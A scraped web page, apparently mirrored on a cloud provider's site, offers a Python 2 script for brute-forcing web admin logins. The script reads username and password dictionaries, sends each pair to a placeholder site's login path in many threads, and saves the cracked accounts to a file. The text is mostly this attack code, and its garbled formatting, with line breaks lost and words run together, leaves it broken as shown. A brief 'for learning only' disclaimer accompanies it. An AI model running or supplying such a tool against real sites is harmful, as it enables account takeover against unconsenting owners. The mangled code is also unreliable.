Python-written HTTP background Weak-password blasting tool

Source: Internet
Author: User

#-*-coding:utf-8-*-#the use of Python-written multi-threaded blasting background user name + password (own dictionary), more practical, even in the information security so much attention today, or some people do not add authentication code or access restrictions such as the login authentication method, so it is easy to be weak password blasting tool down, (this code is limited to learning practical , prohibit web attacks, and do not accept legal liability)ImportUrllib2ImportUrllibImportHttplibImportThreading Headers= {"Content-type":"application/x-www-form-urlencoded",               "Connection":"keep-alive",           "Referer":"http://www.xxxxx.com/"};#Referer: is the access source address of the agent#lock = Threading. Lock ()defTryUser (user,password):#Print User,password    GlobalHeadersGlobalOutFile Conn= Httplib. Httpconnection ("www.xxxxx.com")#remote domain name    ifLen (user) < 3:#limit user name length to exclude useless data from the dictionary        return  #Active Exit Thread    Else:        #Lock.acquire () # multi-threaded Operation file, pre-lock, release after use        #line = Infile.readline ()                   #userData = Line.strip (). split (' # ') # strip () default whitespace removal characters include ', ' \ t ', ' \ n ', etc.        #lock.release ()User=User.strip () passwd=Password.strip () params= Urllib.urlencode ({'username': user,'Password': Passwd}) Conn.request (method="POST", url="/users/login", body=params, Headers=headers)#Background PathResponseText = Conn.getresponse (). read (). decode ('UTF8')#page Encoding        #print ResponseText # for the first time can be printed to see if parsing        if  notResponsetext.find (u'username or password is not correct, please re-enter!') >0:Print '-----find user:', user,'with password:', passwd,'-----'Outfile.write (user+'    '+ passwd +'\ n')                   returnOutFile= Open ('Accounts-cracked.txt','W')   if __name__=='__main__': Tsk=[]#Create a thread poolWith open (r'User.dic','R') as FUser:#use with as to open the file without closing the file yourself, because he will self-close at the right time (similar to the using (...) in C #). {} Interface)With open (r'Pass.dic','R') as Fpass: forUserinchFuser.readlines (): forPasswordinchfpass.readlines (): T= Threading. Thread (target = tryuser,args=(USER,PASSWORD)) T.daemon= False#set not to process daemonTsk.append (t)#T.start ()Fpass.seek (0)#Remember to move the file back to the top of the file, or the first of the outer loops will appear, because the inner layer                #after the iteration (readlines () is the form of an iterator, and once the file pointer refers to the end of the file, the iterator                #also end) the second time there is no password in fpass, that is to say for password in fpass.readlines ():                #is empty, so the inner loop here is not executed, so it is also the problem of the iterator zeroing (C + + itertor often)                                           #Join () No parameter is completely blocking the main thread, waiting for the thread to finish having parameters that is,#wait one second after the main thread does not block the thread, continue to execute the main thread, here means one second to open a thread#the join () cannot be called before thread start, because join () is a thread run-time dispatch     forTinchtsk:t.start () T.join (1)             Print "all Thread Ok,maybe not"outfile.close ()

Python-written HTTP background Weak-password blasting tool

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.